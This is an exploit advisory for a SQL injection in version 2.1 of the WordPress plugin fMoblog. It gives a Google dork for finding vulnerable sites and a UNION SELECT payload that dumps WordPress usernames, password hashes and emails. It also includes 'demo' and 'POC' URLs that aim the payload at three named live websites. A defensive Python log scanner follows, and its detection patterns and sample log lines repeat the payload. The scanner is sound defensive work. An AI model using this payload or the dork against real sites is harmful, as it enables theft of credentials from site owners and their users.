Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################
# Exploit:
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo:
http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
##############################################################
# Greetz: str0ke and milw0rm.com
##############################################################
POC:
http://www.evilredduck.com/?page_id=7&id=-30+union+all+select+1,2,3,4,group_concat%28user_login,0x3a,user_pass,0x3a,user_email%29,6+from+wp_users--
http://www.rantbox.org/?page_id=590&id=-18+union+all+select+1,2,3,4,group_concat%28user_login,0x3a,user_pass,0x3a,user_email%29,6+from+wp_users--
note: sql version 5.x.x
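
For defenders checking whether a site running this plugin was probed, the following sketch (added here, not part of the original advisory or the plugin's code) scans web access logs for requests that pair `page_id` with an `id` value that is not a plain integer. It assumes combined log format and that legitimate gallery `id` values are non-negative integers; the function names and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?page_id=20&id=14 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users-- HTTP/1.1" 200 7300 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /?page_id=7&id=-30+union+all+select+1,2,3,4,group_concat%28user_login,0x3a,user_pass%29,6+from+wp_users-- HTTP/1.1" 200 7300 "-" "Mozilla/5.0"
198.51.100.2 - - [01/Jan/2024:10:01:00 +0000] "GET /?page_id=20 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /?page_id=20&id=14%27 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
UNION_RE = re.compile(r"\bunion\b(\s+all)?\s+select\b", re.IGNORECASE)

def classify_id(value):
    """Return None for a plain integer id, otherwise a reason string."""
    if re.fullmatch(r"\d+", value):
        return None
    if UNION_RE.search(value):
        if "wp_users" in value.lower():
            return "union-select targeting wp_users"
        return "union-select"
    return "non-integer id"

def scan(log_text):
    """Flag requests whose decoded id parameter is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, target, status = m.groups()
        # parse_qs URL-decodes values, so %28 and + forms are handled alike
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "page_id" not in params:
            continue
        for value in params.get("id", []):
            reason = classify_id(value)
            if reason:
                findings.append({"client": client, "status": int(status),
                                 "reason": reason, "id": value})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

A hit with status 200 only shows the request was served; confirming exposure still requires checking the installed plugin version and the response content.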